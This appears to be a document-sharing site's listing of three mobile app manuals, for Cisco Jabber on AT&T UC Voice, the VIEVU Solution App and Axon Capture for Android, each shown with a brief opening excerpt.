AT&T Unified Communications Services Installing Cisco Jabber for AT&T UC Voice on an Android Smartphone For End Users V1.1 Septemberly, 2015 Disclaimer The contents of the document may be revised by AT&T
More informationVIEVU Solution App User Guide
VIEVU Solution App User Guide Contact Us If you need assistance or have any questions, please visit www.vievu.com/vievu-solutionsupport, contact us by phone at 888-285-4548, or email support@vievu.com.
More informationAxon Capture for Android Devices User Manual
Axon Capture for Android Devices User Manual Document Revision: E Product functions and specifications may change without notice and the actual product may vary from the illustrations in this manual. Google,
More information